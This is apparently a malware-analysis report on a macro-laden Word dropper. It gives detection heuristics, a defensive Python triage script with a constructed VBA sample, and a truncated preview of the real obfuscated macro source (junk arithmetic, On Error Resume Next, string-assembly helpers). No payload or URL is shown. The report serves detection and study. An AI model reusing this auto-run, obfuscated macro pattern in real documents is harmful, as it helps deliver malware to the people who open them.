Verdict: MALICIOUS (risk score 204)
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File
The sample is a malicious Office document carrying a VBA macro, carved as macros.bas (61,529 bytes of decoded source). OLE_VBA_SHELL means the macro calls Shell(), the usual way for a macro to start an external process, and OLE_VBA_AUTOOPEN means it has an AutoOpen entry point, so the code runs as soon as the document is opened with macros enabled. OLE_LEGACY_WORDBASIC_AUTOEXEC reports the matching legacy auto-execution marker in the Word stream; its generic description assumes no VBA project was recovered, which is not the case here, so it adds little beyond OLE_VBA_AUTOOPEN. The recovered source is heavily obfuscated: each procedure opens with On Error Resume Next and is padded with arithmetic over variables that are never assigned (the same 6025 - Atn(... / CByte(7) ...) expression repeated under fresh random names, including ChrW(520437311), which is out of range for ChrW), so every junk statement raises a runtime error that the error handler silently skips, while loop conditions such as Do While sPRvImFzzdYA Xor aYEJHdVNi evaluate over uninitialized operands and never enter their bodies. Short string literals are passed through a helper, iuivbdfghnkjgyugjn(string, n, m), whose call shape is consistent with substring-based string assembly, and the artifact contains 31 long base64-like blobs. Together with the ClamAV signature Doc.Dropper.Agent-6458499-0, this pattern is consistent with a dropper or downloader that decodes and executes a second stage, but the preview does not show the Shell() argument or any URL, so the payload and any download location stay unattributed until the assembled strings are decoded.
Heuristics (7)

- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Dropper.Agent-6458499-0
- OLE_VBA_MACROS (medium, 2 related findings): VBA macros detected. Document contains VBA macro code.
- OLE_VBA_SHELL (critical): Shell() call in VBA.
- OLE_VBA_AUTOOPEN (high): AutoOpen macro.
- OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- EXTRACTED_FILE_STATIC_TRIAGE (info): Suspicious extracted artifact. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- EMBEDDED_URL (info): Embedded URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI and appears in any document with drawing content; it is not an indicator on its own.
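The checks behind OLE_VBA_AUTOOPEN, OLE_VBA_SHELL and the base64-blob count in EXTRACTED_FILE_STATIC_TRIAGE are simple to reproduce on decoded macro source, and one more measure is worth having that the report gives only in prose: how much of the code is dead arithmetic over variables that are never assigned. The script below is an added example written for this page, not the analyzer's own code. The VBA it runs on is a constructed sample modelled on the preview (junk arithmetic, On Error Resume Next, a substring-style helper), with an AutoOpen entry point, a base64 blob and a Shell call added so every check fires; it is not the carved macros.bas, and the helper name iuivbdfghnkjgyugjn is used only because it appears in the preview.

```python
"""Static triage of decoded VBA macro source (added example, not the analyzer's code).

Re-implements the AutoOpen, Shell() and base64-blob checks and adds a count of
identifiers that are read but never assigned, which is what the repeated
`6025 - Atn(x / CByte(7) ...)` junk in the preview looks like to a parser.
Feed it the output of `olevba --decode sample.doc` or a carved macros.bas.
"""
import base64
import re
from typing import Dict, List

# Constructed sample modelled on the report's preview; NOT the carved macros.bas.
# The blob is just the alphabet base64-encoded, so the decode attempt has text to show.
SAMPLE_VBA = r'''
Attribute VB_Name = "jnhkbzsM"
Sub AutoOpen()
    On Error Resume Next
    hjznlihJ
    qNRLqhKkwNnNE
End Sub
Sub hjznlihJ()
    On Error Resume Next
    DnbODbGau = 6025 - Atn(fcrDpdBO / CByte(7) + Vciqkbw + Hex(XWkNk)) + (171376742 / ORYRKGOjEAMwZ)
    HAoXiilCYSwof = 6025 - Atn(QmTwb / CByte(7) + YwozzqHCpu + Hex(LWPDSRWmSFjjGn)) + (171376742 / iDfzJqok)
End Sub
Function qNRLqhKkwNnNE()
    On Error Resume Next
    fNhCT = "jMQfPOdiGDvRKTXDtDssPs"
    vjJsIMErIPH = iuivbdfghnkjgyugjn(fNhCT, 12, 1)
    blob = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODk="
    Set sh = CreateObject("WScript.Shell")
    Shell "cmd /c echo " & blob, 0
End Function
'''

# Entry points Office runs without user interaction once macros are enabled.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(AutoOpen|Auto_Open|AutoExec|"
    r"AutoClose|Auto_Close|AutoNew|Document_Open|Document_Close|Workbook_Open)\b",
    re.IGNORECASE | re.MULTILINE)
# Process-spawning primitives a macro dropper or downloader typically ends with.
EXEC_RE = re.compile(r"\bShell\b|WScript\.Shell|\bCreateObject\s*\(|\bGetObject\s*\(", re.IGNORECASE)
# 40+ base64-alphabet characters delimited by something outside that alphabet.
BASE64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/=])")
STRING_RE = re.compile(r'"[^"\n]*"')
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=", re.IGNORECASE | re.MULTILINE)
DECL_RE = re.compile(r"^\s*(?:Dim|Const|Private|Public)\s+([A-Za-z_]\w*)", re.IGNORECASE | re.MULTILINE)
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)",
                     re.IGNORECASE | re.MULTILINE)
# Keywords and built-ins that can never be "unresolved"; extend for other corpora.
VBA_BUILTINS = set("""
sub function end if then else elseif for to step next do while loop until wend on error
resume goto exit set dim const private public as call let with and or not xor mod true
false nothing empty null is new byval byref each in select case atn cos sin tan exp log
sqr abs fix int round hex oct chr chrw chrb asc cbyte cint clng cdbl csng cbool cdate
cstr cvar mid left right len ucase lcase trim replace split join instr strreverse string
array ubound lbound shell createobject getobject msgbox environ
""".split())


def unresolved_identifiers(src: str) -> List[str]:
    """Identifiers read somewhere but never assigned, declared or defined as a
    procedure. Real code has few; junk arithmetic over random names has many."""
    code = STRING_RE.sub('""', src)  # literals are data, not identifiers
    code = "\n".join(l for l in code.splitlines() if not l.lstrip().lower().startswith("attribute "))
    defined = {n.lower() for rx in (ASSIGN_RE, DECL_RE, PROC_RE) for n in rx.findall(code)}
    seen: List[str] = []
    for ident in IDENT_RE.findall(code):
        low = ident.lower()
        if low not in VBA_BUILTINS and low not in defined and low not in {s.lower() for s in seen}:
            seen.append(ident)
    return seen


def base64_blobs(src: str) -> List[Dict[str, object]]:
    """Long base64-looking runs with a decode attempt: text is worth reading now,
    non-text is a candidate second-stage payload to carve and hash."""
    out: List[Dict[str, object]] = []
    for m in BASE64_RE.finditer(src):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError: bad length or padding
            raw = b""
        printable = bool(raw) and all(32 <= b < 127 or b in (9, 10, 13) for b in raw)
        out.append({"length": len(blob), "decoded": raw.decode("ascii") if printable else None})
    return out


def triage(src: str) -> Dict[str, object]:
    return {
        "autoexec": sorted({m.lower() for m in AUTOEXEC_RE.findall(src)}),
        "exec_calls": sorted({m.rstrip("(").strip().lower() for m in EXEC_RE.findall(src)}),
        "on_error_resume_next": len(re.findall(r"^\s*On\s+Error\s+Resume\s+Next\b", src,
                                               re.IGNORECASE | re.MULTILINE)),
        "base64_blobs": base64_blobs(src),
        "unresolved_identifiers": unresolved_identifiers(src),
    }


def verdict(report: Dict[str, object]) -> List[str]:
    """Reasons in the order an analyst would weigh them; empty means nothing fired."""
    reasons = []
    if report["autoexec"]:
        reasons.append("runs on open via " + ", ".join(report["autoexec"]))
    if report["exec_calls"]:
        reasons.append("can spawn a process: " + ", ".join(report["exec_calls"]))
    n = len(report["unresolved_identifiers"])
    if n >= 5:
        reasons.append(f"{n} never-assigned variables used in expressions (junk-code obfuscation)")
    if report["base64_blobs"]:
        reasons.append(f"{len(report['base64_blobs'])} long base64-like blob(s)")
    return reasons


if __name__ == "__main__":
    rep = triage(SAMPLE_VBA)
    for reason in verdict(rep):
        print("-", reason)
    for b in rep["base64_blobs"]:
        print("blob of", b["length"], "chars decodes to:", b["decoded"] or "<binary>")
```

The unresolved-identifier count is the useful addition: on the constructed sample it is nine, all of them operands of the junk expressions plus the undefined helper, while a clean macro scores zero. On a real carve the number will be large and the ratio of unresolved to defined names tells you how much of the 61 KB is padding before you start on the string-assembly helper. The blob decoder deliberately uses validate=True so that random identifier runs and mis-delimited matches are reported as undecodable rather than as garbage bytes.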
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 61529 bytes |

SHA-256: ed69d85284cca2b635aab52bcd70518c571fa5ac2e942bd3ea657fe8bb7c8741

Detection: ClamAV (carved artifact): No threats found. The Doc.Dropper.Agent-6458499-0 hit listed above is on the document itself, not on the decoded VBA source.

Obfuscation or payload: likely. Carved artifact contains 31 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script; the page shows only the beginning). olevba emits every module back to back, so the Attribute VB_Name header for ThisDocument is followed directly by a second header for the module jnhkbzsM, which holds the obfuscated procedures.
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jnhkbzsM"
Sub hjznlihJ()
On Error Resume Next
Do While sPRvImFzzdYA Xor aYEJHdVNi
Dim qohrmSV
Do While ULtYJqnfvfdC Or nQLGZic
DnbODbGau = 6025 - Atn(fcrDpdBO / CByte(7) + Vciqkbw + Hex(XWkNk)) + (171376742 / ORYRKGOjEAMwZ) * (5938624 * ChrW(520437311) + jbhFLTGuU * rmHZjEJFvjdmQL)
Loop
HAoXiilCYSwof = 6025 - Atn(QmTwb / CByte(7) + YwozzqHCpu + Hex(LWPDSRWmSFjjGn)) + (171376742 / iDfzJqok) * (5938624 * ChrW(520437311) + JMrYrWjM * VkRPwzUzJJ)
Do
pPhKiLDXs = GWlwtGawvvWX * CDate(426718607 * Atn(lCwOEh - Fix(LhfObuijpf * CDate(8832))) * LTrPOjRE / CLng(5390)) / 9 - ChrB(8 - Cos(911)) / 83 + Int(twOOzRJwIkwzq) / ZZrXWzcu - ChrB(872) / PcKDNW + Chr(778 / Atn(48 * Round(SzzqjMSROKki / CBool(2)))) / (1199 / CByte(FiTVERpXI * 8 + FOzqwlpOvZURzz * CDbl(39)))
Loop Until jMGaI <= PuVDjJp
wjQJCubjWTfZvo = DnjTUX + izAip
Loop
Set dmSczOzt = IzFYw
End Sub
Function qNRLqhKkwNnNE()
On Error Resume Next
fNhCT = "jMQfPOdiGDvRKTXDtDssPs"
NvXwnjSDOzu = fmiMjiIbBWcFVO = 6025 - Atn(wQYINWG / CByte(7) + RTUZwsjC + Hex(mFwGiX)) + (171376742 / nRNZrCpQrQA) * (5938624 * ChrW(520437311) + BHHbYRRsMJJjU * VSQSGSsr)
opBESpFuz = vJhcPiDhi = 6025 - Atn(qAwidXpNiUdHd / CByte(7) + XjWAY + Hex(hwJmMSr)) + (171376742 / BOIbbriTXnmu) * (5938624 * ChrW(520437311) + FNXrnjcF * HCIXKrqMSLj)
vjJsIMErIPH = iuivbdfghnkjgyugjn(fNhCT, 12, 1)
SUiMpUDjz = "TjstEAFurVrfmdNnjNzpFuDP% tV"
dOrQBiwFzA = rNhtiRna = 6025 - Atn(fZtbBwABmFFfoO / CByte(7) + bJAPBzTcLb + Hex(EjzcovBFIBE)) + (171376742 / mSbhBWAmDwFS) * (5938624 * ChrW(520437311) + QYYALwizT * RCKQKdjFaWWOz)
KXcdNRz = RSGKoiFij = 6025 - Atn(XXcFz / CByte(7) + WmTaK + Hex(qFqJTtiwBCa)) + (171376742 / isqXLommVGtmAd) * (5938624 * ChrW(520437311) + WzjvXO * bAUfKMzkCUwd)
auWELBuTf = iuivbdfghnkjgyugjn(SUiMpUDjz, 2, 16)
fpIWMW = "DKAWHhcF&&p=%1ZO"
wqpBcfzhdpV = jhAvJqTuTZAm = 6025 - Atn(JAzwSL / CByte(7) + ffQjFLQXGDKBCn + Hex(tptbWYwHNXJp)) + (171376742 / MndOcRFERQpwa) * (5938624 * ChrW(520437311) + oQPzjUZGHDrpXh * CMwVZLTav)
IjiwPXN = lhfcZDcwc = 6025 - Atn(rzXZUR / CByte(7) + fZWntY + Hex(OEtcAkUqTbz)) + (171376742 / tiizOsvXjEoW) * (5938624 * ChrW(520437311) + IFnAZ * sJzNUKAvrpBi)
VCuQZ = iuivbdfghnkjgyugjn(fpIWMW, 3, 6)
kIoOtl = "aEVrav%!kOmjuQjDojDi"
LSaUuhFv = tqaUqmYOGTEp = 6025 - Atn(uzpiUiLRw / CByte(7) + PuGHKji + Hex(ciFDErAskDtAhn)) + (171376742 / FEMfRsZqXw) * (5938624 * ChrW(520437311) + LZkiOiYUcG * quzibwIX)
jvCjXrCkrzA = dbUADzERFCsiHZ = 6025 - Atn(aHGpPcNLUnO / CByte(7) + hnRbizAB + Hex(FkaQZGPZOji)) + (171376742 / RDTrSITQQ) * (5938624 * ChrW(520437311) + MpfXd * bKiGXvVXfYqV)
MAbbSzzHnT = iuivbdfghnkjgyugjn(kIoOtl, 13, 5)
zTDYzFJH = "wSXibtfTaAUIGMbDdmmravEfrJj"
aCkkRIMj = kHJKCKtSvRG = 6025 - Atn(EvssFGkNso / CByte(7) + YRoVnFkT + Hex(uKmfstAoAjGF)) + (171376742 / wfXwSKUR) * (5938624 * ChrW(520437311) + pvnlsNpGMKw * juINAMGw)
YuTmvDzDCPD = JiOIVJz = 6025 - Atn(mazUOUrsGAmwu / CByte(7) + vHvMlPjRz + Hex(USjNZcX)) + (171376742 / rPakz) * (5938624 * ChrW(520437311) + VZRUt * TzTnmHN)
ctUjnEHiKGn = iuivbdfghnkjgyugjn(zTDYzFJH, 6, 3)
WSnisCaOtM = "DfkQF% teapGtKvlXDZciMcXWjHfjMFitbD"
qjDKlp = ASwwW = 6025 - Atn(NIQZZiplA / CByte(7) + WksQA + Hex(GZwkahoof)) + (171376742 / jvBjSOiaKjoTTm) * (5938624 * ChrW(520437311) + YLHfaovAdLWA * wjTbtdvukRjI)
iYcLjpq = RFRimG = 6025 - Atn(wCVjIFH / CByte(7) + uYXvNsiiPMap + Hex(rouYXUWqjuYQo)) + (171376742 / tKmSoWIzLtnu) * (5938624 * ChrW(520437311) + mbBWMQU * ObIlkk)
EjTHEQ = iuivbdfghnkjgyugjn(WSnisCaOtM, 27, 4)
tjZHadHvC = "zjNCjVOpiSKLK=%pOAzlCjUmD"
YVuQpCNOiS = ChQsJHYakiMb = 6025 - Atn(cPlzXa / CByte(7) + tPONrUuA + Hex(TZTKAdYHMbr)) + (171376742 / HwtpSwAsLkki) * (5938624 * ChrW(520437311) + smTCAoMXtR * sRIwr)
ODQXzhj = kvjimSVXYX
```
... (truncated)